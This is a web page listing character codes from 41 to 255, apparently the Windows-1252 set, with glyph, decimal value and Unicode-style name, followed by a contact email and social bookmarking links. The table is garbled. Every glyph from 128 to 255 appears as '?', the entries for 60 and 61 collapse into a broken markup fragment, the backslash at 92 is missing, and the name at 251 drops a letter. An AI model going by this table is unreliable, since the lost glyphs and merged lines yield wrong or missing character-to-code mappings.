) 41 Right parenthesis
* 42 Asterisk
+ 43 Plus sign
, 44 Comma
- 45 Hyphen-minus
. 46 Full stop
/ 47 Solidus
0 48 Digit zero
1 49 Digit one
2 50 Digit two
3 51 Digit three
4 52 Digit four
5 53 Digit five
6 54 Digit six
7 55 Digit seven
8 56 Digit eight
9 57 Digit nine
: 58 Colon
; 59 Semicolon
< sign =" 61"> 62 Greater-than sign
? 63 Question mark
@ 64 Commercial at
A 65 Latin capital letter A
B 66 Latin capital letter B
C 67 Latin capital letter C
D 68 Latin capital letter D
E 69 Latin capital letter E
F 70 Latin capital letter F
G 71 Latin capital letter G
H 72 Latin capital letter H
I 73 Latin capital letter I
J 74 Latin capital letter J
K 75 Latin capital letter K
L 76 Latin capital letter L
M 77 Latin capital letter M
N 78 Latin capital letter N
O 79 Latin capital letter O
P 80 Latin capital letter P
Q 81 Latin capital letter Q
R 82 Latin capital letter R
S 83 Latin capital letter S
T 84 Latin capital letter T
U 85 Latin capital letter U
V 86 Latin capital letter V
W 87 Latin capital letter W
X 88 Latin capital letter X
Y 89 Latin capital letter Y
Z 90 Latin capital letter Z
[ 91 Left square bracket
92 Reverse solidus
] 93 Right square bracket
^ 94 Circumflex accent
_ 95 Low line
` 96 Grave accent
a 97 Latin small letter a
b 98 Latin small letter b
c 99 Latin small letter c
d 100 Latin small letter d
e 101 Latin small letter e
f 102 Latin small letter f
g 103 Latin small letter g
h 104 Latin small letter h
i 105 Latin small letter i
j 106 Latin small letter j
k 107 Latin small letter k
l 108 Latin small letter l
m 109 Latin small letter m
n 110 Latin small letter n
o 111 Latin small letter o
p 112 Latin small letter p
q 113 Latin small letter q
r 114 Latin small letter r
s 115 Latin small letter s
t 116 Latin small letter t
u 117 Latin small letter u
v 118 Latin small letter v
w 119 Latin small letter w
x 120 Latin small letter x
y 121 Latin small letter y
z 122 Latin small letter z
{ 123 left curly bracket
| 124 Vertical line
} 125 Right curly bracket
~ 126 Tilde
 127 (not used)
? 128 Euro sign Currency Symbols
? 129 (not used)
? 130 Single low-9 quotation mark General Punctuation
? 131 Latin small letter f with hook Latin Extended-B
? 132 Double low-9 quotation mark General Punctuation
? 133 Horizontal ellipsis General Punctuation
? 134 Dagger General Punctuation
? 135 Double dagger General Punctuation
? 136 Modifier letter circumflex accent Spacing Modifier Letters
? 137 Per mille sign General Punctuation
? 138 Latin capital letter S with caron Latin Extended-A
? 139 Single left-pointing angle quotation mark General Punctuation
? 140 Latin capital ligature OE Latin Extended-A
? 141 (not used)
? 142 Latin capital letter Z with caron Latin Extended-A
? 143 (not used)
? 144 (not used)
? 145 Left single quotation mark General Punctuation
? 146 Right single quotation mark General Punctuation
? 147 Left double quotation mark General Punctuation
? 148 Right double quotation mark General Punctuation
? 149 Bullet General Punctuation
? 150 En dash General Punctuation
? 151 Em dash General Punctuation
? 152 Small tilde Spacing Modifier Letters
? 153 Trade mark sign Letterlike Symbols
? 154 Latin small letter s with caron Latin Extended-A
? 155 Single right-pointing angle quotation mark General Punctuation
? 156 Latin small ligature oe Latin Extended-A
? 157 (not used)
? 158 Latin small letter z with caron Latin Extended-A
? 159 Latin capital letter Y with diaeresis Latin Extended-A
160 No-break space
? 161 Inverted exclamation mark
? 162 Cent sign
? 163 Pound sign
? 164 Currency sign
? 165 Yen sign
? 166 Broken bar
? 167 Section sign
? 168 Diaeresis
? 169 Copyright sign
? 170 Feminine ordinal indicator
? 171 Left-pointing double angle quotation mark
? 172 Not sign
? 173 Soft hyphen
? 174 Registered sign
? 175 Macron
? 176 Degree sign
? 177 Plus-minus sign
? 178 Superscript two
? 179 Superscript three
? 180 Acute accent
? 181 Micro sign
? 182 Pilcrow sign
? 183 Middle dot
? 184 Cedilla
? 185 Superscript one
? 186 Masculine ordinal indicator
? 187 Right-pointing double angle quotation mark
? 188 Vulgar fraction one quarter
? 189 Vulgar fraction one half
? 190 Vulgar fraction three quarters
? 191 Inverted question mark
? 192 Latin capital letter A with grave
? 193 Latin capital letter A with acute
? 194 Latin capital letter A with circumflex
? 195 Latin capital letter A with tilde
? 196 Latin capital letter A with diaeresis
? 197 Latin capital letter A with ring above
? 198 Latin capital letter AE
? 199 Latin capital letter C with cedilla
? 200 Latin capital letter E with grave
? 201 Latin capital letter E with acute
? 202 Latin capital letter E with circumflex
? 203 Latin capital letter E with diaeresis
? 204 Latin capital letter I with grave
? 205 Latin capital letter I with acute
? 206 Latin capital letter I with circumflex
? 207 Latin capital letter I with diaeresis
? 208 Latin capital letter Eth
? 209 Latin capital letter N with tilde
? 210 Latin capital letter O with grave
? 211 Latin capital letter O with acute
? 212 Latin capital letter O with circumflex
? 213 Latin capital letter O with tilde
? 214 Latin capital letter O with diaeresis
? 215 Multiplication sign
? 216 Latin capital letter O with stroke
? 217 Latin capital letter U with grave
? 218 Latin capital letter U with acute
? 219 Latin capital letter U with circumflex
? 220 Latin capital letter U with diaeresis
? 221 Latin capital letter Y with acute
? 222 Latin capital letter Thorn
? 223 Latin small letter sharp s
? 224 Latin small letter a with grave
? 225 Latin small letter a with acute
? 226 Latin small letter a with circumflex
? 227 Latin small letter a with tilde
? 228 Latin small letter a with diaeresis
? 229 Latin small letter a with ring above
? 230 Latin small letter ae
? 231 Latin small letter c with cedilla
? 232 Latin small letter e with grave
? 233 Latin small letter e with acute
? 234 Latin small letter e with circumflex
? 235 Latin small letter e with diaeresis
? 236 Latin small letter i with grave
? 237 Latin small letter i with acute
? 238 Latin small letter i with circumflex
? 239 Latin small letter i with diaeresis
? 240 Latin small letter eth
? 241 Latin small letter n with tilde
? 242 Latin small letter o with grave
? 243 Latin small letter o with acute
? 244 Latin small letter o with circumflex
? 245 Latin small letter o with tilde
? 246 Latin small letter o with diaeresis
? 247 Division sign
? 248 Latin small letter o with stroke
? 249 Latin small letter u with grave
? 250 Latin small letter u with acute
? 251 Latin small letter with circumflex
? 252 Latin small letter u with diaeresis
? 253 Latin small letter y with acute
? 254 Latin small letter thorn
? 255 Latin small letter y with diaeresis


* Contact
cruz3n@jasakom.org

* Blog Sederhana
http://cruzenaldo.co.cc
These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google
  • Furl
  • Reddit
  • Spurl
  • StumbleUpon
  • Technorati